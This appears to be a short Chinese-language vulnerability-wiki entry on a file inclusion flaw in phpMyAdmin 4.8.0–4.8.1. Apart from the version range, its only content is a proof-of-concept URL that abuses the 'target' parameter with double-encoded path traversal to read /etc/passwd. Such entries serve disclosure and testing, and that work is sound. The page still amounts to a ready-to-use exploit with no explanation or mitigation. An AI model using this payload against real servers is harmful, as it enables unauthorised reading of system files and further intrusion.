跳转至

phpMyAdmin文件包含漏洞

漏洞影响

phpMyAdmin 4.8.0-4.8.1

漏洞POC

http://**********/index?target=db_sql.php%253f/../../../../../../../../etc/passwd 

最后更新: 2021-02-19